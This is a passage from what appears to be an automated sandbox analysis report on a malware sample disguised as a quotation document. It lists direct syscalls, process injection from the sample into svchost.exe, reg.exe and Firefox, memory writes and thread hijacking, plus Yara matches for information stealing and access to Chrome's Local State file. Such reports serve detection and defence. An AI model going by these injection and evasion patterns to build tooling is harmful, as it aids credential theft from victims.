                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A830 mov eax, dword ptr fs:[00000030h]1_2_0366A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D483A mov eax, dword ptr fs:[00000030h]1_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D483A mov eax, dword ptr fs:[00000030h]1_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC810 mov eax, dword ptr fs:[00000030h]1_2_036BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA8E4 mov eax, dword ptr fs:[00000030h]1_2_036FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C8F9 mov eax, dword ptr fs:[00000030h]1_2_0366C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C8F9 mov eax, dword ptr fs:[00000030h]1_2_0366C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630887 mov eax, dword ptr fs:[00000030h]1_2_03630887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC89D mov eax, dword ptr fs:[00000030h]1_2_036BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365AF69 mov eax, dword ptr fs:[00000030h]1_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365AF69 mov eax, dword ptr fs:[00000030h]1_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2F60 mov eax, dword ptr fs:[00000030h]1_2_036D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2F60 mov eax, dword ptr fs:[00000030h]1_2_036D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704F68 mov eax, dword ptr fs:[00000030h]1_2_03704F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F40 mov eax, dword ptr fs:[00000030h]1_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F40 mov eax, dword ptr fs:[00000030h]1_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F40 mov eax, dword ptr fs:[00000030h]1_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F40 mov eax, dword ptr fs:[00000030h]1_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4F42 mov eax, dword ptr fs:[00000030h]1_2_036D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CF50 mov eax, dword ptr fs:[00000030h]1_2_0362CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CF50 mov eax, dword ptr fs:[00000030h]1_2_0366CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D0F50 mov eax, dword ptr fs:[00000030h]1_2_036D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EF28 mov eax, dword ptr fs:[00000030h]1_2_0365EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E6F00 mov eax, dword ptr fs:[00000030h]1_2_036E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CF1F mov eax, dword ptr fs:[00000030h]1_2_0366CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670FF6 mov eax, dword ptr fs:[00000030h]1_2_03670FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670FF6 mov eax, dword ptr fs:[00000030h]1_2_03670FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670FF6 mov eax, dword ptr fs:[00000030h]1_2_03670FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670FF6 mov eax, dword ptr fs:[00000030h]1_2_03670FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704FE7 mov eax, dword ptr fs:[00000030h]1_2_03704FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E6FF7 mov eax, dword ptr fs:[00000030h]1_2_036E6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC8 mov eax, dword ptr fs:[00000030h]1_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC8 mov eax, dword ptr fs:[00000030h]1_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC8 mov eax, dword ptr fs:[00000030h]1_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC8 mov eax, dword ptr fs:[00000030h]1_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362EFD8 mov eax, dword ptr fs:[00000030h]1_2_0362EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362EFD8 mov eax, dword ptr fs:[00000030h]1_2_0362EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362EFD8 mov eax, dword ptr fs:[00000030h]1_2_0362EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CF80 mov eax, dword ptr fs:[00000030h]1_2_0366CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662F98 mov eax, dword ptr fs:[00000030h]1_2_03662F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662F98 mov eax, dword ptr fs:[00000030h]1_2_03662F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636E71 mov eax, dword ptr fs:[00000030h]1_2_03636E71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0E7F mov eax, dword ptr fs:[00000030h]1_2_036B0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0E7F mov eax, dword ptr fs:[00000030h]1_2_036B0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0E7F mov eax, dword ptr fs:[00000030h]1_2_036B0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362EE5A mov eax, dword ptr fs:[00000030h]1_2_0362EE5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702E4F mov eax, dword ptr fs:[00000030h]1_2_03702E4F
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C680C9 GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00C680C9
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3A155
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3A124 SetUnhandledExceptionFilter,0_2_00C3A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtTerminateThread: Direct from: 0x77D32FCCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtSetInformationThread: Direct from: 0x77D263F9Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQueryInformationToken: Direct from: 0x77D32CACJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtCreateFile: Direct from: 0x77D32FECJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtOpenFile: Direct from: 0x77D32DCCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtSetInformationProcess: Direct from: 0x77D32C5CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtProtectVirtualMemory: Direct from: 0x77D32F9CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtOpenKeyEx: Direct from: 0x77D32B9CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtResumeThread: Direct from: 0x77D336ACJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtMapViewOfSection: Direct from: 0x77D32D1CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtWriteVirtualMemory: Direct from: 0x77D32E3CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtCreateMutant: Direct from: 0x77D335CCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtNotifyChangeKey: Direct from: 0x77D33C2CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQuerySystemInformation: Direct from: 0x77D32DFCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtReadFile: Direct from: 0x77D32ADCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtAllocateVirtualMemory: Direct from: 0x77D32BFCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtCreateUserProcess: Direct from: 0x77D3371CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQueryInformationProcess: Direct from: 0x77D32C26Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtResumeThread: Direct from: 0x77D32FBCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtDelayExecution: Direct from: 0x77D32DDCJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQueryAttributesFile: Direct from: 0x77D32E6CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtSetInformationThread: Direct from: 0x77D32B4CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtReadVirtualMemory: Direct from: 0x77D32E8CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtCreateKey: Direct from: 0x77D32C6CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtClose: Direct from: 0x77D32B6C
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtAllocateVirtualMemory: Direct from: 0x77D33C9CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtWriteVirtualMemory: Direct from: 0x77D3490CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtOpenSection: Direct from: 0x77D32E0CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQueryVolumeInformationFile: Direct from: 0x77D32F2CJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtProtectVirtualMemory: Direct from: 0x77D27B2EJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtAllocateVirtualMemory: Direct from: 0x77D348ECJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtAllocateVirtualMemory: Direct from: 0x77D32BECJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtDeviceIoControlFile: Direct from: 0x77D32AECJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeNtQuerySystemInformation: Direct from: 0x77D348CCJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeThread register set: target process: 1456Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeThread APC queued: target process: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A02008Jump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C687B1 LogonUserW,0_2_00C687B1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C712C7 SendInput,keybd_event,0_2_00C712C7
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C74C53 mouse_event,0_2_00C74C53
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe"Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C67CAF
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C6874B
                Source: Circular No.12-7 Quotation.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3412143821.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000000.1023125396.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000000.1171588185.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Circular No.12-7 Quotation.exe, 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3412143821.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000000.1023125396.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3412143821.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000000.1023125396.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000000.1171588185.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3412143821.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000000.1023125396.0000000001500000.00000002.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000000.1171588185.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3862B cpuid 0_2_00C3862B
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C44E87
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C51E06 GetUserNameW,0_2_00C51E06
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0
                Source: Circular No.12-7 Quotation.exe, 00000000.00000003.954245944.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000003.954312969.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000002.965558821.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3410503483.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100047298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412367873.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3414676780.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412285944.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100405446.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100935711.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3412469604.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
